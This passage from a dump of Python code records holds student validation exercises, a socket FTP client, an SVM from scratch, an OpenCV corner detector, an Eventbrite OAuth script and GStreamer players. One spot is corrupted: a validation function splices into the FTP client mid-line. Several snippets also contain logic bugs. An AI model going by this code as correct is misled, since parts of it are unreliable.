codigo[7].isdigit()==True:\n #validamos que una parte de la cadena sea numeros\n if codigo[0:7].isdigit()==True:\n return True\n else:\n return False\n #fin_si\n else:\n return False\n #fin_si\n else:\n return False\n #fin_si\n else:\n return False\n 
#fin_si\n\n#fin_def\n\n#ejercicio 11 \"validacion de una fuerza realizada\"\ndef validar_fuerza(masa,aceleracion):\n #primero validamos el numero ingresado que sea un real\n fuerza=int(masa)*int(aceleracion)\n fuerza_cero=\"La fuerza realizada es cero ya que la aceleracion es igual a 0\"\n if masa.isdigit()==True:\n if aceleracion.isdigit()==True:\n if fuerza==0:\n return fuerza_cero\n elif fuerza>0:\n return fuerza\n else:\n return -1*fuerza\n\n else:\n return False\n else:\n return False\n #fin_si\n#fin_def\n\n#ejercicio 12 \"validar un interruptor\"\ndef validar_interruptor(comando):\n #validar que sea un str:\n on=\"prendido\"\n oof=\"apagado\"\n if comando.isalpha()==True:\n #una ves que validamos que sea un str colocamos las condiciones\n if comando.upper()==\"ON\":\n return on\n elif comando.upper()==\"OOF\":\n return oof\n else:\n return False\n else:\n return False\n\n\n #fin_si\n\n#ejercicio 13 \"lanzamiento de un balon de basket\"\ndef validar_lanzamiento(distancia):\n #validamos primeramente la longitud de la cadena\n if len(distancia[0])>0 and len(distancia[0])<=3:\n #validamos que sea alfanumerico\n\n if distancia.isalnum()==True:\n\n if len(distancia)==2:\n #validamos que tenga el signo al final\n if distancia[1]==\"m\":\n if int(distancia[0])>=6:\n print(\"fue anotacion de 3\")\n else:\n print(\"FUE anotacion de 2\")\n else:\n return False\n elif len(distancia)==3:\n if distancia[2]==\"m\":\n if int(distancia[0])>=6:\n print(\"fue anotacion 3\")\n else:\n print(\"fue anotacion de 2\")\n else:\n return False\n else:\n return False\n else:\n return False\n else:\n return False\n\n#ejercicio 14 \"numero telefonico de peru ejemplo \"+51973396201\" \"\ndef validar_numero_peru(telefono):\n #validamos la longitud de la cadena\n if len(telefono)==12:\n #validamos el valor inicial\n if telefono[0]==\"+\":\n #validamos los dos siguientes digitos\n if telefono[1:3]==51:\n if telefono[1:].isdigit()==True:\n return True\n else:\n return False\n else:\n return False\n else:\n return False\n else:\n return False\n\n\n#ejercicio 15 \"validar un factorial\"\n\ndef validar_factorial(cifras,factorial):\n cif=1\n #validamos la longitud de cualquier factorial y a la vez estamos validando de que no sea un numero negativo\n if cifras+1==len(factorial):\n #validamos el ingreso de factoriales\n if factorial[cifras+1]==\"!\":\n #validamos que sean numeros\n if factorial[0:cifras+1].isdigit()==True:\n #una vez que validamos esttablecemos condiciones\n #si es facotrial d euno o cero retorna automaticamente un 1 si no se hara el calculo respectivoy retornara la variable factor\n if factorial==\"1!\" or factorial==\"0!\":\n return 1\n else:\n for i in range(2,factorial[0:cifras+1]):\n cif*=i\n return cif\n else:\n return False\n else:\n return False\n else:\n return False\n #FIN_SI\n\n#fin_def\n\n#ejercicio 16 \"validar el comando de un videojuego\"\ndef valida_salto(hop):\n pos=1\n letra=\"\"\n numero=\"\"\n direccion=\"\"\n if len(hop)==13:\n for iteam in hop.split(\" \"):\n if pos==1:\n iteam=letra\n if letra.isdigit()==False:\n return True\n else:\n return False\n if pos==2:\n iteam=numero\n if numero.isalpha()==False:\n return True\n else:\n return False\n if pos==3:\n iteam=direccion\n if direccion.isdigit()==False:\n return True\n else:\n return False\n else:\n return False\n\n\n#ejercicio 17 \"validar la hora ingresada ejemplo 03:34 am\"\ndef validar_hora(horario):\n pico_del_dia=\"12:00 m\"\n #validamos la longitud\n if len(horario)==8:\n #validamos la estructura de la cadena\n if 
horario[0:2].isdigit()==True:\n if horario[2]==\":\":\n if horario[3:5].isdigit()==True:\n if horario[5]==\" \":\n if horario[6:]==\"am\":\n return True\n elif horario[6:]==\"pm\":\n return True\n else:\n return False\n else:\n return False\n else:\n return False\n else:\n return False\n else:\n return False\n elif len(horario)==7:\n return pico_del_dia\n else:\n return False\n\n\n\n#ejercicio 18 \"validar un numero mayo de 2 cifras en donde si es mayor retorna el numero mayor\"\ndef validar_mayor(num1,num2):\n #validamos la longitud\n if len(num1)==2 and len(num2):\n #validamos si la cadena esta compuesta de digitos\n if num1.isdigit()==True and num2.isdigit()==True:\n #validamos que sea mayor\n if num1>num2:\n return num1\n else:\n return False\n else:\n return False\n else:\n return False\n\n\n#ejercicio 19 \"validar un numero menor de 2 cifras en donde si es menor retorna el menor\"\ndef validar_menor(numero1,numero2):\n #validamos la longitud\n if len(numero1)==2 and len(numero2):\n #VALIDAMOS QUE LA CADENA ESTE COMPUESTA DE NUMEROS\n if numero1.isdigit()==True and numero2.isdigit()==True:\n #validamos que sea menor\n if numero1>>:').strip()\n if not cmd:\n continue\n cmd_list = cmd.split(' ')\n command = cmd_list[0]\n if hasattr(self, command):\n func = getattr(self, command)\n func(cmd_list)\n else:\n print('命令格式输入有误')\n\n def put(self, args):\n # 规范化文件路径,os.path.normpath在linux平台无效\n file_path = os.path.normpath(args[-1])\n if not os.path.exists(file_path):\n print('要上传的文件不存在')\n # 此处调用return是为了防止else语句块过大\n return\n else:\n file_size = os.stat(file_path).st_size\n # 发送头信息\n headers_dict = {'command': args[0], 'filename': os.path.basename(file_path), 'filesize': file_size}\n headers_json = json.dumps(headers_dict)\n headers_bytes = headers_json.encode(self.coding)\n # 注意,struct发的是长度,先把头的长度再发过去,然后在send头信息,server取固定的头长度得到头信息长度,根据\n # 头长度取得头信息,因此这里的两次send不会粘包,因为有头信息来控制\n self.socket.send(struct.pack('i', len(headers_bytes)))\n self.socket.send(headers_bytes)\n\n send_size = 0\n with open(file_path, 'rb') as f:\n for line in f:\n already_send_size = len(line)\n self.socket.send(line)\n send_size += already_send_size\n # print(send_size)\n else:\n print('upload success')\n\n def get(self, args):\n headers_dict = {'command': args[0], 'filename': args[-1]}\n headers_json = json.dumps(headers_dict)\n headers_bytes = headers_json.encode(self.coding)\n headers_length = len(headers_bytes)\n self.socket.send(struct.pack('i', headers_length))\n self.socket.send(headers_bytes)\n\n headers_struct = self.socket.recv(4)\n headers_length = struct.unpack('i', headers_struct)[0]\n headers_str = self.socket.recv(headers_length)\n headers_dict = json.loads(headers_str)\n err_msg = headers_dict.get('err_msg', None)\n if err_msg:\n print(err_msg)\n return\n file_path = os.path.join(self.client_dir, args[-1])\n print(file_path)\n filesize = headers_dict.get('file_size')\n already_recv_size = 0\n with open(file_path, 'wb') as f:\n while already_recv_size < filesize:\n recv_data = self.socket.recv(self.max_package_size)\n f.write(recv_data)\n already_recv_size += len(recv_data)\n\nif __name__ == '__main__':\n obj = FTPClient(('192.168.0.98', 13140))\n obj.run()\n\n\n\n","sub_path":"day39/ftpclient.py","file_name":"ftpclient.py","file_ext":"py","file_size_in_byte":4036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"115545724","text":"import os\r\n\r\ninput_file = open(\"input_large.in\", \"r\")\r\noutput_file = open(\"output_large.txt\", 
\"w\")\r\n\r\ncases = int(input_file.readline())\r\n\r\nfor i in range(cases):\r\n\tstack = list(input_file.readline()[0:-1])\r\n\tlast = \"\"\r\n\tclean_stack = []\r\n\tfor p in stack:\r\n\t\tif p != last:\r\n\t\t\tclean_stack.append(p)\r\n\t\tlast = p\r\n\r\n\tfrowns = clean_stack.count(\"-\") * 2\r\n\tif clean_stack[0] == \"-\":\r\n\t\tfrowns -= 1\r\n\r\n\toutput_file.write(\"Case #\" + str(i+1) + \": \" + str(frowns) + \"\\n\")","sub_path":"codes/CodeJamCrawler/16_0_2_neat/16_0_2_PartlyGloudy_Revenge of the Pancakes.py","file_name":"16_0_2_PartlyGloudy_Revenge of the Pancakes.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"355570550","text":"import matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\nfrom matplotlib import style\r\n\r\nstyle.use(\"ggplot\")\r\n\r\nclass support_vector_machine:\r\n def __init__ (self, visualisation = True):\r\n self.visualisation = visualisation\r\n self.colors = {1: \"r\", -1: \"b\"}\r\n if self.visualisation:\r\n self.fig = plt.figure()\r\n self.ax = self.fig.add_subplot(1, 1, 1)\r\n \r\n def fit (self, data):\r\n self.data = data\r\n # {||w||: [w, b]} \r\n opt_dict = {}\r\n transforms = [[1, 1], [1, -1], [-1, 1], [-1, -1]]\r\n \r\n all_data = []\r\n for y_i in self.data:\r\n for feature_set in self.data[y_i]:\r\n for feature in feature_set:\r\n all_data.append(feature)\r\n \r\n self.max_feature_value = max(all_data)\r\n self.min_feature_value = min(all_data)\r\n all_data = None\r\n \r\n step_sizes = [self.max_feature_value * 0.1, self.max_feature_value * 0.01, self.max_feature_value * 0.001]\r\n b_range_multiple = 5\r\n b_multiple = 5\r\n \r\n latest_optimum = self.max_feature_value * 10\r\n \r\n for step in step_sizes: \r\n w = np.array([latest_optimum, latest_optimum])\r\n # SVM is always a convex optimisation problem\r\n optimised = False\r\n \r\n while not optimised:\r\n for b in np.arange(-1 * (self.max_feature_value * b_range_multiple), self.max_feature_value * b_range_multiple, step * b_multiple):\r\n for transformation in transforms:\r\n w_t = w * transformation\r\n found_option = True\r\n for i in self.data:\r\n for x_i in self.data[i]:\r\n y_i = i\r\n if not y_i * (np.dot(w_t, x_i) + b) >= 1:\r\n found_option = False\r\n \r\n if found_option:\r\n opt_dict[np.linalg.norm(w_t)] = [w_t, b]\r\n \r\n if w[0] < 0:\r\n optimised = True\r\n print(\"Optimised a step\")\r\n else:\r\n w = w - step\r\n \r\n norms = sorted([n for n in opt_dict])\r\n opt_choice = opt_dict[norms[0]]\r\n \r\n self.w = opt_choice[0]\r\n self.b = opt_choice[1]\r\n latest_optimum = opt_choice[0][0] + step * 2\r\n \r\n \r\n def predict (self, features):\r\n classification = np.sign(np.dot(np.array(self.w), self.w) + self.b)\r\n \r\n if classification != 0 and self.visualisation:\r\n self.ax.scatter(features[0], features[1], s = 200, marker = \"*\", color = self.colors[classification])\r\n \r\n return classification\r\n \r\n def visualise (self):\r\n [[self.ax.scatter(x[0], x[1], s = 100, color = self.colors[i]) for x in data_dict[i]] for i in data_dict]\r\n \r\n def hyper_plane (x, w, b, v):\r\n return (-w[0] * x - b + v) / w[1]\r\n \r\n data_range = (self.min_feature_value * 0.9, self.max_feature_value * 1.1)\r\n hyp_x_min = data_range[0]\r\n hyp_x_max = data_range[1]\r\n \r\n psv_1 = hyper_plane(hyp_x_min, self.w, self.b, 1)\r\n psv_2 = hyper_plane(hyp_x_max, self.w, self.b, 1)\r\n self.ax.plot([hyp_x_min, hyp_x_max], [psv_1, psv_2])\r\n \r\n nsv_1 = hyper_plane(hyp_x_min, 
self.w, self.b, -1)\r\n nsv_2 = hyper_plane(hyp_x_max, self.w, self.b, -1)\r\n self.ax.plot([hyp_x_min, hyp_x_max], [nsv_1, nsv_2])\r\n \r\n db_1 = hyper_plane(hyp_x_min, self.w, self.b, 0)\r\n db_2 = hyper_plane(hyp_x_max, self.w, self.b, 0)\r\n self.ax.plot([hyp_x_min, hyp_x_max], [db_1, db_2])\r\n \r\n plt.show()\r\n \r\n \r\ndata_dict = {-1: np.array([[1, 7], [2, 8], [3, 8]]), 1: np.array([[5, 1], [6, -1], [7, 3]])}\r\nsvm = support_vector_machine()\r\nsvm.fit(data = data_dict)\r\nsvm.visualise()","sub_path":"svm_from_scratch.py","file_name":"svm_from_scratch.py","file_ext":"py","file_size_in_byte":4081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"244263475","text":"import numpy as np\n\nclass Base:\n\n gen = None\n\n def __init__(self, generator):\n print(\"Importing base...\")\n self.gen = generator\n self.gen.functionList.append(\"addall [r] [g] [b] [a]\")\n self.gen.functionList.append(\"setall [r] [g] [b] [a]\")\n self.gen.functionList.append(\"set [x] [y] [r] [g] [b] [a]\")\n self.gen.commands[\"addall\"] = self.addall\n self.gen.commands[\"setall\"] = self.setall\n self.gen.commands[\"set\"] = self.set\n \n def addall(self, r, g, b, a):\n colorVector = np.fromstring(r + \" \" + g + \" \" + b + \" \" + a, dtype=int, sep=' ')\n \n print(\"adding \" + str(colorVector) + \" to all pixels...\") # DEBUG\n\n self.gen.imgArray = self.gen.imgArray + colorVector\n self.gen.imgArray = np.clip(self.gen.imgArray, 0, 255)\n\n def setall(self, r, g, b, a):\n colorVector = np.fromstring(r + \" \" + g + \" \" + b + \" \" + a, dtype=int, sep=' ')\n \n print(\"setting all pixels to \" + str(colorVector) + \"...\") # DEBUG\n \n for y in range(0, self.gen.imgHeight):\n for x in range(0, self.gen.imgWidth):\n self.gen.imgArray[y][x] = colorVector\n \n def set(self, x, y, r, g, b, a, verbose=True):\n colorVector = np.fromstring(r + \" \" + g + \" \" + b + \" \" + a, dtype=int, sep=' ')\n print(\"setting pixel at (\" + str(x) + \",\" + str(y) + \") to \" + str(colorVector) + \"...\") # DEBUG\n\n self.gen.imgArray[int(y)][int(x)] = colorVector\n","sub_path":"py/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"440543777","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Oct 26 13:14:30 2014\n\n@author: Scott Will, SUNY Buffalo, Department of Electrical Engineering\n\"\"\"\n\nimport cv2\nimport numpy as np\n\ncv2.destroyAllWindows()\n\n# Read in the target image\nfilename = '../../data/m7/IMG_0290.JPG'\nimg = cv2.imread(filename)\n\n# Convert BGR to HSV\nhsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n\n# define range of red color in HSV\nlower_red = np.array([0, 0, 0])\nupper_red = np.array([5, 255, 255])\n\n# Threshold the HSV image to get only red colors\nmask = cv2.inRange(hsv, lower_red, upper_red)\n\n# Bitwise-AND mask and original image\nres = cv2.bitwise_and(img, img, mask=mask)\n\n# Convert to grayscale\ngray = cv2.cvtColor(res, cv2.COLOR_BGR2GRAY)\ngray = np.float32(gray)\n\n# Run Harris corner detection\n# Arguments: (image, blocksize, sobel aperture size, free parameter)\ndst = cv2.cornerHarris(gray, 2, 3, 0.04)\n\n# Result is dilated for marking the corners, not important\ndst = cv2.dilate(dst, None)\n\n# Threshold for an optimal value, it may vary depending on the image.\nimg[dst > 0.01*dst.max()] = [0, 0, 255]\n\ncv2.imshow('dst', 
img)\ncv2.waitKey()\n","sub_path":"src/legacy/harris.py","file_name":"harris.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"172706750","text":"import xlrd\nimport datetime\n\nprovinces = {'黑龙江','青海','陕西','重庆','辽宁','贵州','西藏','福建','甘肃','湖南','湖北','海南','浙江','河南','河北','江西','江苏','新疆','广西','广东','山西','山东','安徽','宁夏','天津','四川','吉林','北京','内蒙古','云南','上海','31省'}\nprovince_ids = {'451','971','290','230','240','851','891','591','931','731','270','898','571','371','311','791','250','991','771','200','351','531','551','951','220','280','431','100','471','871','210'}\n\ndef hasProvince(channels):\n for province in provinces:\n if channels.find(province) > -1:\n return True\n\nchannel_delete = \"DELETE FROM PRODUCT.PM_PRODUCT_CHANNEL_CFG WHERE PRODUCT_ID = {0} AND CHANNEL_ID = {1};\"\nchannel_insert = \"INSERT INTO PRODUCT.PM_PRODUCT_CHANNEL_CFG (PRODUCT_ID, CHANNEL_ID, INURE_TIME, EXPIRE_TIME, OPR_CODE, EFFT_TYPE) VALUES ({0}, {1}, SYSDATE, TO_DATE('3000-01-01 00:00:00', 'YYYY-MM-DD HH24:MI:SS'), {2}, '{3}');\"\ndef openChannel(product_id,opr_list,out):\n for province_id in province_ids:\n print(channel_delete.format(product_id,province_id),file=out)\n for opr in opr_list:\n for i in range(1,5):\n print(channel_insert.format(product_id,province_id,opr,i),file=out)\n print(\"\",file=out)\n\n\nsync_delete = \"DELETE FROM CUSTOMER.CC_SYNC_ORDER_CONFIG WHERE PRODUCT_ID = '{0}' AND ROUTE_VALUE = '{1}';\"\nsync_insert = \"INSERT INTO CUSTOMER.CC_SYNC_ORDER_CONFIG (CONFIG_ID, PRODUCT_ID, ROUTE_VALUE, STATUS) VALUES (CUSTOMER.SEQ_SYNC_ORDER_CONFIG.NEXTVAL, '{0}', '{1}', '1');\"\ndef openProvince(product_id,out):\n for province_id in province_ids:\n print(sync_delete.format(product_id,province_id),file=out)\n print(sync_insert.format(product_id,province_id),file=out)\n print(\"\",file=out)\n\nopr_map = {\n 5: '7', # 资源勘查\n 6: '8', # 资源预占\n 7: '9', # 预占延期\n 8: '10', # 预占取消\n 9: '1', # 产品开通\n 10: '5', # 资费变更\n 11: '6', # 资源变更\n 12: '23', # 产品续订\n 13: '3', # 业务暂停\n 14: '4', # 业务恢复\n 15: '2', # 业务注销\n 16: '25', # 成员管理\n 17: '44', # 密码重置\n 18: '11', # 系统暂停\n 19: '80', # 产品审批\n 20: '12' # 系统恢复\n}\n\ndef getAllProducts(sheet):\n product_list = set()\n for rowx in range(1,sheet.nrows):\n product_id = sheet.cell_value(rowx,2)\n channels = sheet.cell_value(rowx,3)\n if product_id != '':\n if hasProvince(channels):\n product_list.add(product_id)\n return product_list\n\ndef getAllOprations(product_list,sheet):\n channels = { x : [] for x in product_list }\n for rowx in range(1,sheet.nrows):\n pid = sheet.cell_value(rowx,1)\n if pid in channels:\n oprs = channels[pid]\n opr = sheet.cell_value(rowx,2)\n effType = sheet.cell_value(rowx,4)\n oprs.append([opr,effType])\n return channels\n\n\ndef openChannel1(opr_map,out):\n for p_id in opr_map:\n for province_id in province_ids:\n print(channel_delete.format(p_id,province_id),file=out)\n for oprs in opr_map[p_id]:\n print(channel_insert.format(p_id,province_id,oprs[0],oprs[1]),file=out)\n print(\"\",file=out)\n\n\ntimestamp = datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S')\nprint_file1 = r'D:/Workspaces/channel_{}.sql'.format(timestamp)\nprint_file2 = r'D:/Workspaces/province_{}.sql'.format(timestamp)\n\ndef printSQL(file1,file2):\n ''' print sql to file''' \n excel = xlrd.open_workbook(r'D:\\Workspaces\\SVN\\EBOSS\\trunk\\01_需求分析\\02-产品需求\\政企EBOSS产品树.xlsx')\n sheet = excel.sheet_by_name(u'产品受理操作')\n with open(file1, encoding='utf8', mode='a') as 
a_file,open(file2,encoding='utf8',mode='a') as b_file:\n for rowx in range(1,sheet.nrows):\n product_id = sheet.cell_value(rowx,2)\n channels = sheet.cell_value(rowx,3)\n oprs = [ opr_map[x] for x in range(5,21) if sheet.cell_value(rowx,x) == 'Y' ]\n if product_id != '':\n if hasProvince(channels):\n openChannel(product_id,oprs,a_file)\n openProvince(product_id,b_file)\n print(\"\",file=a_file)\n print(\"\",file=b_file)\n\ndef printChannelSQL(file):\n excel = xlrd.open_workbook(r'D:\\Workspaces\\SVN\\EBOSS\\trunk\\01_需求分析\\02-产品需��\\政企EBOSS产品树.xlsx')\n sheet1 = excel.sheet_by_name(u'产品受理操作')\n product_list = getAllProducts(sheet1)\n sheet2 = excel.sheet_by_name(u'产品订购及账期生效规则')\n opr_map = getAllOprations(product_list,sheet2)\n with open(file, encoding='utf8', mode='a') as a_file:\n openChannel1(opr_map,a_file)\n\nprintChannelSQL(print_file1)","sub_path":"python/product/AllProvince.py","file_name":"AllProvince.py","file_ext":"py","file_size_in_byte":4881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"118585212","text":"import webbrowser\nimport json\nimport requests\nimport requests_oauthlib\nfrom functools import reduce\nimport csv\nfrom eb_data import CLIENT_ID, CLIENT_SECRET, personal_token\nimport sys\nfrom datetime import datetime\n\nDATETIME_FORMAT = \"%Y-%m-%d %H:%M:%S.%f\"\nAUTHORIZATION_URL = 'https://www.eventbrite.com/oauth/authorize'\nTOKEN_URL = 'https://www.eventbrite.com/oauth/token'\nREDIRECT_URI = 'https://www.programsinformationpeople.org/runestone/oauth'\n\nHARVEY_CACHE_FNAME = \"harvey_cache_contents.json\"\nCONCERT_CACHE_FNAME = \"concert_cache_contents.json\"\n\n#--------------------------------------------------\n# Load cache files: data and credentials\n#--------------------------------------------------\n# Load data cache\ndef check_if_cached(fname):\n try:\n with open(fname, 'r') as cache_file:\n cache_json = cache_file.read()\n CACHE_DICTION = json.loads(cache_json)\n except:\n CACHE_DICTION = {}\n return CACHE_DICTION\n\ndef has_cache_expired(timestamp_str, expire_in_days):\n \"\"\"Check if cache timestamp is over expire_in_days old\"\"\"\n # gives current datetime\n now = datetime.now()\n\n # datetime.strptime converts a formatted string into datetime object\n cache_timestamp = datetime.strptime(timestamp_str, DATETIME_FORMAT)\n\n # subtracting two datetime objects gives you a timedelta object\n delta = now - cache_timestamp\n delta_in_days = delta.days\n\n # now that we have days as integers, we can just use comparison\n # and decide if cache has expired or not\n if delta_in_days > expire_in_days:\n return True # It's been longer than expiry time\n else:\n return False\n\n# This is just for testing\nHARVEY_CACHE_DICTION = check_if_cached(HARVEY_CACHE_FNAME)\nCONCERT_CACHE_DICTION = check_if_cached(CONCERT_CACHE_FNAME)\n\ndef get_saved_token():\n with open('token.json', 'r') as f:\n token_json = f.read()\n token_dict = json.loads(token_json)\n\n return token_dict\n\n\ndef save_token(token_dict, expire_in_days):\n token_dict['timestamp'] = datetime.now().strftime(DATETIME_FORMAT)\n token_dict['expire_in_days'] = expire_in_days\n with open('token.json', 'w') as f:\n token_json = json.dumps(token_dict)\n f.write(token_json)\n\n\ndef get_eventbrite_cache(search_params, CACHE_FNAME, expire_in_days=7, force_download=False):\n CACHE_DICTION = check_if_cached(CACHE_FNAME)\n token_expired = False\n # if we need to get an oauth2 session started\n if CACHE_DICTION == {} or force_download:\n # see if we have the 
token\n try:\n token = get_saved_token()\n except FileNotFoundError:\n token = None\n\n if token:\n if not has_cache_expired(token['timestamp'], token['expire_in_days']):\n print('Token already saved and not expired')\n oauth2inst = requests_oauthlib.OAuth2Session(CLIENT_ID, token=token)\n else:\n print('token has expired, will need to get a new one')\n token_expired=True\n\n if token is None or token_expired:\n print('Getting token the long way')\n oauth2inst = requests_oauthlib.OAuth2Session(CLIENT_ID, redirect_uri=REDIRECT_URI) # Create an instance of an OAuth2Session\n\n # get the authorization url to send the user to\n authorization_url, state = oauth2inst.authorization_url(AUTHORIZATION_URL)\n\n # Opening auth URL for you to sign in to the EventBrite service\n webbrowser.open(authorization_url) \n authorization_response = input('Authenticate and then enter the full callback URL: ').strip() # Need to get the full URL in order to parse the response\n\n # The OAuth2Session instance has a method that extracts what we need from the url, and helps do some other back and forth with EB\n token = oauth2inst.fetch_token(TOKEN_URL, authorization_response=authorization_response, client_secret=CLIENT_SECRET)\n save_token(token, expire_in_days=expire_in_days)\n \n\n\n print('Token saved. Getting search results')\n r = oauth2inst.get('https://www.eventbriteapi.com/v3/events/search/', params=search_params)\n\n # the result is now a dictionary\n response_diction = json.loads(r.text)\n with open(CACHE_FNAME, 'w') as cache_file:\n print('caching result as:', CACHE_FNAME)\n for event in response_diction['events']:\n CACHE_DICTION[event['id']] = event\n cache_json = json.dumps(CACHE_DICTION, indent=2)\n cache_file.write(cache_json)\n else:\n print(\"{} already saved as cache, will return it\".format(CACHE_FNAME))\n \n return CACHE_DICTION\n\n\n\n\nclass Event(object):\n def __init__(self, event_dict):\n self.event = event_dict\n self.id = self.event.get('id')\n self.name = self.event.get('name', {}).get('text')\n\n self.capacity = self.event.get('capacity')\n self.url = self.event.get('url')\n self.is_free = self.event.get('is_free')\n self.description = self.event.get('description', {}).get('text')\n\n self.get_data()\n\n def get_data(self, key_list=[('id',), ('name', 'text'), ('capacity',),\n ('url',), ('is_free',),\n ('description', 'text')]):\n self.data = {}\n for key in key_list:\n try:\n self.data[','.join(key)] = reduce(dict.get, key, self.event)\n except:\n self.data[','.join(key)] = None\n\n def __str__(self):\n return \"{0}: {1}\".format(self.id, self.name)\n\n\ndef write_to_csv(event_list, filename):\n with open(filename, 'w') as outfile:\n outwriter = csv.writer(outfile, delimiter=',')\n keys = event_list[0].data.keys()\n header = list(keys)\n outwriter.writerow(header)\n\n for event in event_list:\n row = list(event.data.values())\n outwriter.writerow(row)\n\n\nif __name__ == '__main__':\n try:\n force_download = sys.argv[1].lower() == 'true'\n except:\n force_download = False\n\n harvey_search_params = {'q':'Hurricane Harvey',\n \"location.address\":'6100 Main St, Houston, TX 77005',\n 'location.within':'30mi'}\n concert_search_params = {'q':'concert',\n 'location.address': \"500 S State St, Ann Arbor, MI 48109\",\n 'location.within':'20mi'}\n\n harvey_response = get_eventbrite_cache(harvey_search_params, \n HARVEY_CACHE_FNAME,\n force_download=force_download)\n\n concert_response = get_eventbrite_cache(concert_search_params,\n CONCERT_CACHE_FNAME,\n force_download=force_download)\n\n 
harvey_event_list = [Event(event_dict) for event_dict in harvey_response.values()]\n concert_event_list = [Event(event_dict) for event_dict in concert_response.values()]\n print('writing to csv')\n write_to_csv(harvey_event_list, 'harvey.csv')\n write_to_csv(concert_event_list, 'um_concert.csv')\n","sub_path":"SI507project5_code.py","file_name":"SI507project5_code.py","file_ext":"py","file_size_in_byte":7205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"209277738","text":"# -*- coding: utf-8 -*-\n# !/usr/bin/env python\nimport gi\ngi.require_version('Gst', '1.0')\nfrom gi.repository import GLib, Gst\nfrom json import loads\n\n\nclass BaseStreamer(object):\n def __init__(self, desc=None):\n if not Gst.is_initialized():\n if not Gst.init_check(None):\n raise BaseException\n self.config_name = ''\n self.playing = False\n self.pool = dict()\n self.pipeline = Gst.Pipeline()\n self.bus = self.pipeline.get_bus()\n self.bus.add_signal_watch()\n self.bus.connect('message::eos', self.on_eos)\n self.bus.connect('message::error', self.on_error)\n if desc:\n self._create_pipeline(desc)\n\n def _create_pipeline(self, desc):\n if isinstance(desc, str):\n desc = loads(desc)\n\n for (name, props) in desc.iteritems():\n etype = props.pop('type', 'audioresample')\n link_to = props.pop('link', None)\n caps = props.pop('caps', None)\n self.pool[name] = Gst.ElementFactory.make(etype, None)\n self.pipeline.add(self.pool[name])\n if caps:\n self.pool[name].set_property('caps', Gst.caps_from_string(caps))\n self.pool[name].link_to = link_to\n for (prop, val) in props.iteritems(): # set all the properties\n self.pool[name].set_property(prop, val)\n\n for elem in self.pool.itervalues():\n if elem.link_to:\n elem.link(self.pool[elem.link_to])\n\n def _destroy_pipeline(self):\n self.stop()\n for name in self.pool:\n with self.pool.pop(name) as elem:\n elem.unlink()\n self.pipeline.remove(elem)\n\n def set_config(self, desc):\n self._destroy_pipeline()\n self._create_pipeline(desc)\n\n def play(self):\n self.pipeline.set_state(Gst.State.NULL)\n self.pipeline.set_state(Gst.State.PLAYING)\n self.playing = True\n\n def stop(self):\n self.playing = False\n return self.pipeline.set_state(Gst.State.NULL)\n\n def state(self):\n return str(self.pipeline.get_state(0)[1]).split()[1]\n\n def on_eos(self, bus, msg):\n print('on_eos()')\n\n def on_error(self, bus, msg):\n print('on_error():', msg.parse_error())\n\n\n\n\nfrom gi.repository import GObject, Gst, Gtk\n# Needed for window.get_xid(), xvimagesink.set_window_handle(), respectively:\nfrom gi.repository import GdkX11, GstVideo\n\n# GObject.threads_init()\n# Gst.init(None)\n\nclass VideoPlayer(BaseStreamer):\n def __init__(self):\n super\n self.window = Gtk.Window()\n self.window.connect('destroy', self.stop)\n self.window.set_default_size(640, 480)\n\n self.drawingarea = Gtk.DrawingArea()\n self.window.add(self.drawingarea)\n\n # This is needed to make the video output in our DrawingArea:\n self.bus.enable_sync_message_emission()\n self.bus.connect('sync-message::element', self.on_sync_message)\n\n self.playbin = Gst.ElementFactory.make('playbin', None)\n self.pipeline.add(self.playbin)\n\n def show(self):\n self.window.show_all()\n # You need XID after window.show_all(). 
Don't get it in on_sync_message() because threading causes segfaults.\n self.xid = self.drawingarea.get_property('window').get_xid()\n self.window.fullscreen()\n\n def play(self, ):\n self.pipeline.set_state(Gst.State.NULL)\n self.pipeline.set_state(Gst.State.PLAYING)\n self.playing = True\n\n def stop(self, window=None):\n self.pipeline.set_state(Gst.State.NULL)\n self.playing = False\n #Gtk.main_quit()\n\n def set_config(self, cfg=''):\n self.playbin.set_property('uri', 'file://' + cfg)\n\n def state(self):\n return str(self.pipeline.get_state(0)[1]).split()[1]\n\n def on_sync_message(self, bus, msg):\n if msg.get_structure().get_name() == 'prepare-window-handle':\n print('prepare-window-handle')\n msg.src.set_window_handle(self.xid)\n\n def on_eos(self, bus, msg):\n print('on_eos(): seeking to start of video')\n self.pipeline.seek_simple(Gst.Format.TIME, Gst.SeekFlags.FLUSH | Gst.SeekFlags.KEY_UNIT, 0)\n\n def on_error(self, bus, msg):\n print('on_error():', msg.parse_error())\n\n\n\n\nif __name__ == \"__main__\":\n description = '{\"src\": {\"multicast-iface\": \"eth0\", \"auto-multicast\": true, \"caps\": \"application/x-rtp,media=(string)audio,clock-rate=(int)48000,encoding-name=(string)X-GST-OPUS-DRAFT-SPITTKA-00\", \"type\": \"udpsrc\", \"port\": 3333, \"multicast-group\": \"224.1.1.1\"}, \"sink\": {\"device\": \"hw:0,0\", \"link\": \"dec\", \"type\": \"alsasink\"}, \"dec\": {\"link\": \"rtp\", \"type\": \"opusdec\", \"use-inband-fec\": false}, \"rtp\": {\"link\": \"jtr\", \"type\": \"rtpopusdepay\"}, \"jtr\": {\"link\": \"src\", \"latency\": 200, \"type\": \"rtpjitterbuffer\", \"do-retransmission\": true}}'\n sink = 